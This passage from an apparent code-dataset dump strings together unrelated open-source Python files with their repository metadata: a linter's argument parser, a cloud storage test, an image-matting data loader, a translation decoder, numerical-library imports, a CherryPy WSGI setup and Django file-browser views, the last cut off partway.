+ repr(Constants.default_coafile))
FIND_CONFIG_HELP = ('Attempt to find config file by checking parent '
'directories of the current working directory. It is '
'assumed that the config file is named '
+ repr(Constants.default_coafile) + '. This arg is '
'ignored if --config is also given')
arg_parser.add_argument('-F',
'--find-config',
nargs='?',
const=True,
metavar='BOOL',
help=FIND_CONFIG_HELP)
arg_parser.add_argument('-f',
'--files',
nargs='+',
metavar='FILE',
help='Files that should be checked')
arg_parser.add_argument('-i',
'--ignore',
nargs='+',
metavar='FILE',
help='Files that should be ignored')
arg_parser.add_argument('--limit-files',
nargs='+',
metavar='FILE',
help='Files that will be analyzed will be '
'restricted to those in the globs listed '
'in this argument as well the files setting')
arg_parser.add_argument('-b',
'--bears',
nargs='+',
metavar='NAME',
help='Names of bears to use')
BEAR_DIRS_HELP = 'Additional directories where bears may lie'
arg_parser.add_argument('-d',
'--bear-dirs',
nargs='+',
metavar='DIR',
help=BEAR_DIRS_HELP)
LOG_LEVEL_HELP = ("Enum('ERROR','INFO','WARNING','DEBUG') to set level of "
"log output")
arg_parser.add_argument('-L',
'--log-level',
nargs=1,
choices=['ERROR', 'INFO', 'WARNING', 'DEBUG'],
metavar='ENUM',
help=LOG_LEVEL_HELP)
MIN_SEVERITY_HELP = ("Enum('INFO', 'NORMAL', 'MAJOR') to set the minimal "
"result severity.")
arg_parser.add_argument('-m',
'--min-severity',
nargs=1,
choices=('INFO', 'NORMAL', 'MAJOR'),
metavar='ENUM',
help=MIN_SEVERITY_HELP)
SETTINGS_HELP = 'Arbitrary settings in the form of section.key=value'
arg_parser.add_argument('-S',
'--settings',
nargs='+',
metavar='SETTING',
help=SETTINGS_HELP)
SHOW_BEARS_HELP = ("Display bears and its metadata with the sections "
"that they belong to")
arg_parser.add_argument('-B',
'--show-bears',
nargs='?',
const=True,
metavar='BOOL',
help=SHOW_BEARS_HELP)
arg_parser.add_argument('-A',
'--show-all-bears',
nargs='?',
const=True,
metavar='BOOL',
help="Display all bears.")
SAVE_HELP = ('Filename of file to be saved to, if provided with no '
'arguments, settings will be stored back to the file given '
'by -c')
arg_parser.add_argument('-s',
'--save',
nargs='?',
const=True,
metavar='FILE',
help=SAVE_HELP)
TAG_HELP = ('Tag results with a specific name. You can access the results'
' later with that tag.')
arg_parser.add_argument('-t',
'--tag',
nargs='?',
const=True,
metavar='STRING',
help=TAG_HELP)
DELETE_TAG_HELP = 'Delete pre-tagged results with tag name.'
arg_parser.add_argument('-g',
'--dtag',
nargs='?',
const=True,
metavar='STRING',
help=DELETE_TAG_HELP)
arg_parser.add_argument("-j",
"--jobs",
type=int,
help="Number of jobs to use in parallel.")
arg_parser.add_argument('-v',
'--version',
action='version',
version=Constants.VERSION)
arg_parser.add_argument('-n',
'--no-orig',
nargs='?',
const=True,
help="Deactivate creation of .orig files,"
".orig backup files before applying patches")
return arg_parser
| agpl-3.0 | 3,654,604,630,600,306,000 | 44.211268 | 79 | 0.40405 | false |
zstackio/zstack-woodpecker | integrationtest/vm/multihosts/multiPrimaryStorage/test_one_ps_disabled.py | 1 | 4290 | '''
@author: FangSun
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.primarystorage_operations as ps_ops
import random
_config_ = {
'timeout' : 3000,
'noparallel' : True
}
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
VM_COUNT = 1
VOLUME_NUMBER = 0
new_ps_list = []
disabled_ps_list = []
@test_stub.skip_if_local_shared
def test():
ps_env = test_stub.PSEnvChecker()
if ps_env.is_sb_ceph_env:
env = test_stub.SanAndCephPrimaryStorageEnv(test_object_dict=test_obj_dict,
first_ps_vm_number=VM_COUNT,
second_ps_vm_number=VM_COUNT,
first_ps_volume_number=VOLUME_NUMBER,
second_ps_volume_number=VOLUME_NUMBER)
else:
env = test_stub.TwoPrimaryStorageEnv(test_object_dict=test_obj_dict,
first_ps_vm_number=VM_COUNT,
second_ps_vm_number=VM_COUNT,
first_ps_volume_number=VOLUME_NUMBER,
second_ps_volume_number=VOLUME_NUMBER)
env.check_env()
env.deploy_env()
first_ps_vm_list = env.first_ps_vm_list
first_ps_volume_list = env.first_ps_volume_list
second_ps_vm_list = env.second_ps_vm_list
second_ps_volume_list = env.second_ps_volume_list
if env.new_ps:
new_ps_list.append(env.second_ps)
tbj_list = first_ps_vm_list + second_ps_vm_list + first_ps_volume_list + second_ps_volume_list
test_util.test_dsc('Disable random one Primary Storage')
disabled_ps = random.choice([env.first_ps, env.second_ps])
if disabled_ps is env.first_ps:
enabled_ps = env.second_ps
else:
enabled_ps = env.first_ps
ps_ops.change_primary_storage_state(disabled_ps.uuid, state='disable')
disabled_ps_list.append(disabled_ps)
test_util.test_dsc('make sure all VM and Volumes still OK and running')
for test_object in tbj_list:
test_object.check()
test_util.test_dsc("Try to Create vm in disabeld ps")
with test_stub.expected_failure("Create vm in disabled ps", Exception):
test_stub.create_multi_vms(name_prefix='test-vm', count=1, ps_uuid=disabled_ps.uuid)
test_util.test_dsc("Create 5 vms and check all should be in enabled PS")
if ps_env.is_sb_ceph_env:
if disabled_ps.uuid == env.first_ps:
vm_list = test_stub.create_multi_vms(name_prefix='test_vm', count=5, ps_uuid=enabled_ps.uuid, bs_type="Ceph")
else:
vm_list = test_stub.create_multi_vms(name_prefix='test_vm', count=5, ps_uuid=enabled_ps.uuid, bs_type="ImageStoreBackupStorage")
else:
vm_list = test_stub.create_multi_vms(name_prefix='test_vm', count=5)
for vm in vm_list:
test_obj_dict.add_vm(vm)
for vm in vm_list:
assert vm.get_vm().allVolumes[0].primaryStorageUuid != disabled_ps.uuid
ps_ops.change_primary_storage_state(disabled_ps.uuid, state='enable')
disabled_ps_list.pop()
test_util.test_dsc("Create 1 vms in the recovered ps")
if ps_env.is_sb_ceph_env:
if disabled_ps.uuid == env.first_ps:
vm = test_stub.create_multi_vms(name_prefix='test_vm', count=1, ps_uuid=disabled_ps.uuid, bs_type="ImageStoreBackupStorage")[0]
else:
vm = test_stub.create_multi_vms(name_prefix='test_vm', count=1, ps_uuid=disabled_ps.uuid, bs_type="Ceph")[0]
else:
vm = test_stub.create_multi_vms(name_prefix='test_vm', count=1, ps_uuid=disabled_ps.uuid)[0]
test_obj_dict.add_vm(vm)
test_util.test_pass('Multi PrimaryStorage Test Pass')
def env_recover():
test_lib.lib_error_cleanup(test_obj_dict)
for disabled_ps in disabled_ps_list:
ps_ops.change_primary_storage_state(disabled_ps.uuid, state='enable')
if new_ps_list:
for new_ps in new_ps_list:
ps_ops.detach_primary_storage(new_ps.uuid, new_ps.attachedClusterUuids[0])
ps_ops.delete_primary_storage(new_ps.uuid)
| apache-2.0 | 197,871,456,999,399,580 | 41.475248 | 140 | 0.622378 | false |
PetroWu/AutoPortraitMatting | portrait.py | 1 | 8570 | import numpy as np
import scipy.io as sio
import os
from PIL import Image
class BatchDatset:
imgs = []
max_batch = 0
batch_size = 0
cur_imgs = []
cur_labels = []
cur_batch = 0 # index of batch generated
cur_ind = 0 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['trainlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
self.cur_imgs, self.cur_labels = self.get_variations(self.imgs[0])
def next_batch(self):
while len(self.cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_imgs, tmp_labels = self.get_variations(cur_name)
self.cur_imgs += tmp_imgs
self.cur_labels += tmp_labels
if len(self.cur_imgs) >= self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = self.cur_imgs.pop(0)
ramat[i, :, :, 0] = self.cur_labels.pop(0)
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat
return [], []
def get_variations(self, img_name):
imgs = []
labels = []
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
imgs.append(nimat)
labels.append(namat)
angs = [-45, -22, 22, 45]
gammas = [0.8, 0.9, 1.1, 1.2]
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
i_img = Image.fromarray(np.uint8(org_mat))
a_img = Image.fromarray(np.uint8(amat))
for i in range(4):
tmpi_img = i_img.rotate(angs[i])
tmpa_img = a_img.rotate(angs[i])
tmpri_img = np.array(tmpi_img, dtype=np.int)
rimat = np.zeros(tmpri_img.shape, dtype=np.float)
for k in range(h):
for j in range(w):
rimat[k][j][0] = (tmpri_img[k][j][2] * 1.0 - 104.008) / 255
rimat[k][j][1] = (tmpri_img[k][j][1] * 1.0 - 116.669) / 255
rimat[k][j][2] = (tmpri_img[k][j][0] * 1.0 - 122.675) / 255
imgs.append(rimat)
labels.append(np.array(tmpa_img, dtype=np.int))
tmp_nimat = np.array(imat, dtype=np.float)
tmp_nimat[:, :, 0] = tmp_nimat[:, :, 0] * 255 + 104.01
tmp_nimat[:, :, 0] = (pow(tmp_nimat[:, :, 0], gammas[i]) - pow(104.01, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 1] = tmp_nimat[:, :, 1] * 255 + 116.67
tmp_nimat[:, :, 1] = (pow(tmp_nimat[:, :, 1], gammas[i]) - pow(116.67, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 2] = tmp_nimat[:, :, 2] * 255 + 122.68
tmp_nimat[:, :, 2] = (pow(tmp_nimat[:, :, 2], gammas[i]) - pow(122.68, gammas[i])) / pow(255, gammas[i])
imgs.append(tmp_nimat)
labels.append(namat)
return imgs, labels
class TestDataset:
imgs = []
max_batch = 0
batch_size = 0
cur_batch = 0 # index of batch generated
cur_ind = -1 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['testlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
#self.cur_imgs, self.cur_labels = self.get_images(self.imgs[0])
def next_batch(self):
cur_imgs = []
cur_labels = []
cur_orgs = []
while len(cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_img, tmp_label, tmp_org = self.get_images(cur_name)
if tmp_img is not None:
cur_imgs.append(tmp_img)
cur_labels.append(tmp_label)
cur_orgs.append(tmp_org)
if len(cur_imgs) == self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
org_mat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.int)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = cur_imgs.pop(0)
org_mat[i] = cur_orgs.pop(0)
ramat[i, :, :, 0] = cur_labels.pop(0)
#print('getting', ramat[0, 200:210, 200:220])
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat, org_mat
return [], [], []
def get_images(self, img_name):
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
return nimat, namat, org_mat
return None, None, None
if __name__ == '__main__':
data = BatchDatset('data/trainlist.mat')
'''ri, ra = data.next_batch()
while len(ri) != 0:
ri, ra = data.next_batch()
print(np.sum(ra))'''
imgs, labels = data.get_variations(47)
cnt = 0
for img in imgs:
mat = np.zeros(img.shape, dtype=np.int)
h, w, _ = img.shape
for i in range(h):
for j in range(w):
mat[i][j][0] = round(img[i][j][2] * 255 + 122.675)
mat[i][j][1] = round(img[i][j][1] * 255 + 116.669)
mat[i][j][2] = round(img[i][j][0] * 255 + 104.008)
im = Image.fromarray(np.uint8(mat))
im.save('img-'+str(cnt)+'.jpg')
cnt += 1
| apache-2.0 | 5,070,734,809,259,799,000 | 42.72449 | 149 | 0.502684 | false |
query/mt-submissions | hw2-decoding/decode.py | 1 | 7691 | #!/usr/bin/env python
"""A translation decoder."""
from collections import defaultdict, namedtuple
import models
Hypothesis = namedtuple('Hypothesis',
['logprob', 'future_cost', 'coverage',
'lm_state', 'predecessor', 'candidate'])
def decode(tm, lm, source_sentence,
stack_size=1, max_reordering=None):
"""Return the most probable decoding of *source_sentence* under the
provided probabilistic translation and language models."""
# Compute the future cost table.
future_costs = {}
for segment_length in xrange(1, len(source_sentence) + 1):
for start in xrange(len(source_sentence) - segment_length + 1):
end = start + segment_length
future_costs[(start, end)] = float('-inf')
candidates = tm.get(source_sentence[start:end], [])
if candidates:
logprob = candidates[0].logprob
lm_state = tuple()
for target_word in candidates[0].english.split():
lm_state, word_logprob = lm.score(lm_state, target_word)
logprob += word_logprob
future_costs[(start, end)] = logprob
for mid in xrange(start + 1, end):
future_costs[(start, end)] = max(
future_costs[(start, mid)] + future_costs[(mid, end)],
future_costs[(start, end)])
# Actually start decoding.
initial = Hypothesis(0.0, future_costs[(0, len(source_sentence))],
(False,) * len(source_sentence),
lm.begin(), None, None)
# We add 1 here because we need to have stacks for both ends: 0 and
# len(source_sentence).
stacks = [{} for _ in xrange(len(source_sentence) + 1)]
stacks[0][lm.begin()] = initial
# Iterate over every stack but the last. It's not possible to add
# anything to a hypothesis in the last stack anyway, so we skip it.
for i, stack in enumerate(stacks[:-1]):
# Take only the best *stack_size* hypotheses. Using the sum of
# the log-probability and the future cost negatively impacts the
# model score (??).
hypotheses = sorted(stack.itervalues(),
key=lambda h: -h.logprob)[:stack_size]
for hypothesis in hypotheses:
# Save ourselves a couple of levels of indentation later on.
def untranslated_segments():
if max_reordering is None:
starts = xrange(len(source_sentence))
else:
starts = xrange(min(i + max_reordering,
len(source_sentence)))
for start in starts:
if hypothesis.coverage[start]:
continue
ends = xrange(start, len(source_sentence))
for end in ends:
if hypothesis.coverage[end]:
break
yield (start, end + 1)
# Iterate over blocks of untranslated source words.
for start, end in untranslated_segments():
source_phrase = source_sentence[start:end]
# Get all of the potential candidate translations.
candidates = tm.get(source_phrase, [])
# Translate unknown unigrams to themselves.
if not candidates and len(source_phrase) == 1:
candidates.append(models.phrase(source_phrase[0], 0.0))
for candidate in candidates:
logprob = hypothesis.logprob + candidate.logprob
# Make a new coverage vector with the appropriate
# elements set to True. This isn't pretty. Sorry.
coverage = (hypothesis.coverage[:start] +
(True,) * (end - start) +
hypothesis.coverage[end:])
# Find the future cost estimate for this hypothesis
# by summing over contiguous incomplete segments.
future_cost = 0.0
cost_start = None
for cost_i, covered in enumerate(coverage + (True,)):
if covered:
if cost_start is not None:
future_cost += \
future_costs[(cost_start, cost_i)]
cost_start = None
else:
if cost_start is None:
cost_start = cost_i
# Make a new LM state.
lm_state = hypothesis.lm_state
for target_word in candidate.english.split():
lm_state, word_logprob = \
lm.score(lm_state, target_word)
logprob += word_logprob
# Add the final transition probability if the end of
# this segment is also the end of the sentence.
if end == len(source_sentence):
logprob += lm.end(lm_state)
# If the new hypothesis is the best hypothesis for
# its state and number of completed words, push it
# onto the stack, replacing any that is present.
completed = sum(int(x) for x in coverage)
if (lm_state not in stacks[completed] or
(stacks[completed][lm_state].logprob +
stacks[completed][lm_state].future_cost) <
logprob + future_cost):
stacks[completed][lm_state] = Hypothesis(
logprob, future_cost, coverage,
lm_state, hypothesis, candidate)
# We don't need to specify a key, since we're looking for the best
# log-probability, and that's the first element of a hypothesis.
best = max(stacks[-1].itervalues())
current = best
decoding = []
while current.candidate:
decoding.insert(0, current.candidate.english)
current = current.predecessor
return tuple(decoding)
def main():
import argparse
parser = argparse.ArgumentParser(
description='A translation decoder.')
parser.add_argument(
'tm_path', metavar='TM',
help='path to translation model')
parser.add_argument(
'lm_path', metavar='LM',
help='path to language model')
parser.add_argument(
'input_file', metavar='INPUT', type=argparse.FileType('r'),
help='path to file containing sentences to decode')
parser.add_argument(
'-k', '--max-candidates', type=int, default=1,
help='maximum number of translation candidates to consider for '
'each phrase')
parser.add_argument(
'-r', '--max-reordering', type=int,
help='maximum number of source words that can be skipped '
'during reordering')
parser.add_argument(
'-s', '--stack-size', type=int, default=1,
help='maximum hypothesis stack size')
args = parser.parse_args()
tm = models.TM(args.tm_path, args.max_candidates)
lm = models.LM(args.lm_path)
for source_line in args.input_file:
source_sentence = tuple(source_line.split())
print ' '.join(decode(tm, lm, source_sentence,
stack_size=args.stack_size,
max_reordering=args.max_reordering))
if __name__ == '__main__':
main()
| mit | -7,950,587,443,624,482,000 | 45.896341 | 76 | 0.52854 | false |
michaellaier/pymor | src/pymor/basic.py | 1 | 3271 | # This file is part of the pyMOR project (http://www.pymor.org).
# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
"""This module imports some commonly used methods and classes.
You can use ``from pymor.basic import *`` in interactive session
to have the most important parts of pyMOR directly available.
"""
from pymor.algorithms.basisextension import trivial_basis_extension, gram_schmidt_basis_extension, pod_basis_extension
from pymor.algorithms.ei import interpolate_operators, ei_greedy, deim
from pymor.algorithms.greedy import greedy
from pymor.analyticalproblems.advection import InstationaryAdvectionProblem
from pymor.analyticalproblems.burgers import BurgersProblem, Burgers2DProblem
from pymor.analyticalproblems.elliptic import EllipticProblem
from pymor.analyticalproblems.thermalblock import ThermalBlockProblem
from pymor.core.cache import clear_caches, enable_caching, disable_caching
from pymor.core.defaults import print_defaults, write_defaults_to_file, load_defaults_from_file, set_defaults
from pymor.core.logger import set_log_levels, getLogger
from pymor.core.pickle import dump, dumps, load, loads
from pymor.discretizations.basic import StationaryDiscretization, InstationaryDiscretization
from pymor.domaindescriptions.basic import RectDomain, CylindricalDomain, TorusDomain, LineDomain, CircleDomain
from pymor.domaindescriptions.boundarytypes import BoundaryType
from pymor.domaindiscretizers.default import discretize_domain_default
from pymor.discretizers.advection import discretize_nonlinear_instationary_advection_fv
from pymor.discretizers.elliptic import discretize_elliptic_cg, discretize_elliptic_fv
from pymor.functions.basic import ConstantFunction, GenericFunction, ExpressionFunction, LincombFunction
from pymor.grids.boundaryinfos import EmptyBoundaryInfo, BoundaryInfoFromIndicators, AllDirichletBoundaryInfo
from pymor.grids.oned import OnedGrid
from pymor.grids.rect import RectGrid
from pymor.grids.tria import TriaGrid
from pymor.la.basic import induced_norm, cat_arrays
from pymor.la.gram_schmidt import gram_schmidt
from pymor.la.interfaces import VectorSpace
from pymor.la.numpyvectorarray import NumpyVectorArray, NumpyVectorSpace
from pymor.la.pod import pod
from pymor.operators.numpy import NumpyGenericOperator, NumpyMatrixOperator
from pymor.operators.constructions import (LincombOperator, Concatenation, ComponentProjection, IdentityOperator,
ConstantOperator, VectorArrayOperator, VectorOperator, VectorFunctional,
FixedParameterOperator)
from pymor.operators.ei import EmpiricalInterpolatedOperator
from pymor.parameters.base import Parameter
from pymor.parameters.functionals import (ProjectionParameterFunctional, GenericParameterFunctional,
ExpressionParameterFunctional)
from pymor.parameters.spaces import CubicParameterSpace
from pymor.reductors.basic import reduce_generic_rb, reduce_to_subbasis
from pymor.reductors.stationary import reduce_stationary_coercive
from pymor.tools.floatcmp import float_cmp, float_cmp_all
from pymor.tools.random import new_random_state
| bsd-2-clause | 1,916,091,494,274,894,800 | 50.920635 | 118 | 0.819016 | false |
paolodoz/timesheet | embedded/modwsgi.py | 1 | 1518 | #!/usr/bin/env python
import cherrypy, logging
import sys, os
# Suppose this file in
installation_path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.insert(0, installation_path)
from core.routes.routes import Routes
from core.config import conf_server, conf_static, conf_logging
def secureheaders():
headers = cherrypy.response.headers
headers['X-Frame-Options'] = 'DENY'
headers['X-XSS-Protection'] = '1; mode=block'
headers['Content-Security-Policy'] = "default-src='self'"
# Update configurations
# If log paths are absolute, move to current path
if not os.path.isabs(conf_server['log.access_file']):
conf_server['log.access_file'] = os.path.join(installation_path, conf_server['log.access_file'])
if not os.path.isabs(conf_server['log.error_file']):
conf_server['log.error_file'] = os.path.join(installation_path, conf_server['log.error_file'])
conf_server['environment'] = 'embedded'
cherrypy.config.update(conf_server)
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
for logname, loglevel in conf_logging.items():
logging_level = getattr(logging, loglevel)
cherrypy_log = getattr(cherrypy.log, logname)
cherrypy_log.setLevel(logging_level)
cherrypy.tools.secureheaders = cherrypy.Tool('before_finalize', secureheaders, priority=60)
routes = Routes()
application = cherrypy.Application(routes, config=conf_static)
| gpl-2.0 | -6,801,214,810,711,781,000 | 35.142857 | 100 | 0.732543 | false |
dwaiter/django-filebrowser-old | filebrowser/views.py | 1 | 19478 | # coding: utf-8
# general imports
import itertools, os, re
from time import gmtime, strftime
# django imports
from django.shortcuts import render_to_response, HttpResponse
from django.template import RequestContext as Context
from django.http import HttpResponseRedirect
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from django.conf import settings
from django import forms
from django.core.urlresolvers import reverse
from django.core.exceptions import ImproperlyConfigured
from django.dispatch import Signal
from django.core.paginator import Paginator, InvalidPage, EmptyPage
try:
# django SVN
from django.views.decorators.csrf import csrf_exempt
except:
# django 1.1
from django.contrib.csrf.middleware import csrf_exempt
# filebrowser imports
from filebrowser.settings import *
from filebrowser.functions import path_to_url, sort_by_attr, get_path, get_file, get_version_path, get_breadcrumbs, get_filterdate, get_settings_var, handle_file_upload, convert_filename
from filebrowser.templatetags.fb_tags import query_helper
from filebrowser.base import FileObject
from filebrowser.decorators import flash_login_required
# Precompile regular expressions
filter_re = []
for exp in EXCLUDE:
filter_re.append(re.compile(exp))
for k,v in VERSIONS.iteritems():
exp = (r'_%s.(%s)') % (k, '|'.join(EXTENSION_LIST))
filter_re.append(re.compile(exp))
def browse(request):
"""
Browse Files/Directories.
"""
# QUERY / PATH CHECK
query = request.GET.copy()
path = get_path(query.get('dir', ''))
directory = get_path('')
q = request.GET.get('q')
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
if directory is None:
# The DIRECTORY does not exist, raise an error to prevent eternal redirecting.
raise ImproperlyConfigured, _("Error finding Upload-Folder. Maybe it does not exist?")
redirect_url = reverse("fb_browse") + query_helper(query, "", "dir")
return HttpResponseRedirect(redirect_url)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# INITIAL VARIABLES
results_var = {'results_total': 0, 'results_current': 0, 'delete_total': 0, 'images_total': 0, 'select_total': 0 }
counter = {}
for k,v in EXTENSIONS.iteritems():
counter[k] = 0
if q:
m_root = os.path.normpath(MEDIA_ROOT)
dirs = [
[(os.path.normpath(root)[len(m_root)+1:], f) for f in filenames]
for root, _subdirs, filenames in os.walk(abs_path)
]
dir_list = itertools.chain(*dirs)
else:
root = os.path.join(DIRECTORY, path)
dir_list = ((root, f) for f in os.listdir(abs_path))
files = []
for file_dir, file in dir_list:
# EXCLUDE FILES MATCHING VERSIONS_PREFIX OR ANY OF THE EXCLUDE PATTERNS
filtered = file.startswith('.')
for re_prefix in filter_re:
if re_prefix.search(file):
filtered = True
if filtered:
continue
results_var['results_total'] += 1
# CREATE FILEOBJECT
fileobject = FileObject(os.path.join(file_dir, file))
# FILTER / SEARCH
append = False
if fileobject.filetype == request.GET.get('filter_type', fileobject.filetype) and get_filterdate(request.GET.get('filter_date', ''), fileobject.date or 0):
append = True
if q and not re.compile(q.lower(), re.M).search(file.lower()):
append = False
# APPEND FILE_LIST
if append:
try:
# COUNTER/RESULTS
if fileobject.filetype == 'Image':
results_var['images_total'] += 1
if fileobject.filetype != 'Folder':
results_var['delete_total'] += 1
elif fileobject.filetype == 'Folder' and fileobject.is_empty:
results_var['delete_total'] += 1
if query.get('type') and query.get('type') in SELECT_FORMATS and fileobject.filetype in SELECT_FORMATS[query.get('type')]:
results_var['select_total'] += 1
elif not query.get('type'):
results_var['select_total'] += 1
except OSError:
# Ignore items that have problems
continue
else:
files.append(fileobject)
results_var['results_current'] += 1
# COUNTER/RESULTS
if fileobject.filetype:
counter[fileobject.filetype] += 1
# SORTING
query['o'] = request.GET.get('o', DEFAULT_SORTING_BY)
query['ot'] = request.GET.get('ot', DEFAULT_SORTING_ORDER)
folders = [f for f in files if f.filetype == 'Folder']
folders = sort_by_attr(folders, 'filename')
files = [f for f in files if f.filetype != 'Folder']
files = sort_by_attr(files, request.GET.get('o', DEFAULT_SORTING_BY))
if not request.GET.get('ot') and DEFAULT_SORTING_ORDER == "desc" or request.GET.get('ot') == "desc":
files.reverse()
p = Paginator(files, LIST_PER_PAGE)
try:
page_nr = request.GET.get('p', '1')
except:
page_nr = 1
try:
page = p.page(page_nr)
except (EmptyPage, InvalidPage):
page = p.page(p.num_pages)
return render_to_response('filebrowser/index.html', {
'dir': path,
'p': p,
'q': q,
'page': page,
'folders': folders,
'results_var': results_var,
'counter': counter,
'query': query,
'title': _(u'FileBrowser'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': ""
}, context_instance=Context(request))
browse = staff_member_required(never_cache(browse))
# mkdir signals
filebrowser_pre_createdir = Signal(providing_args=["path", "dirname"])
filebrowser_post_createdir = Signal(providing_args=["path", "dirname"])
def mkdir(request):
"""
Make Directory.
"""
from filebrowser.forms import MakeDirForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
if request.method == 'POST':
form = MakeDirForm(abs_path, request.POST)
if form.is_valid():
server_path = os.path.join(abs_path, form.cleaned_data['dir_name'])
try:
# PRE CREATE SIGNAL
filebrowser_pre_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# CREATE FOLDER
os.mkdir(server_path)
os.chmod(server_path, 0775)
# POST CREATE SIGNAL
filebrowser_post_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# MESSAGE & REDIRECT
msg = _('The Folder %s was successfully created.') % (form.cleaned_data['dir_name'])
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new directory on top of the list
# remove filter in order to actually _see_ the new folder
# remove pagination
redirect_url = reverse("fb_browse") + query_helper(query, "ot=desc,o=date", "ot,o,filter_type,filter_date,q,p")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
if errno == 13:
form.errors['dir_name'] = forms.util.ErrorList([_('Permission denied.')])
else:
form.errors['dir_name'] = forms.util.ErrorList([_('Error creating folder.')])
else:
form = MakeDirForm(abs_path)
return render_to_response('filebrowser/makedir.html', {
'form': form,
'query': query,
'title': _(u'New Folder'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'New Folder')
}, context_instance=Context(request))
mkdir = staff_member_required(never_cache(mkdir))
def upload(request):
"""
Multipe File Upload.
"""
from django.http import parse_cookie
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# SESSION (used for flash-uploading)
cookie_dict = parse_cookie(request.META.get('HTTP_COOKIE', ''))
engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])
session_key = cookie_dict.get(settings.SESSION_COOKIE_NAME, None)
return render_to_response('filebrowser/upload.html', {
'query': query,
'title': _(u'Select files to upload'),
'settings_var': get_settings_var(),
'session_key': session_key,
'breadcrumbs': get_breadcrumbs(query, path),
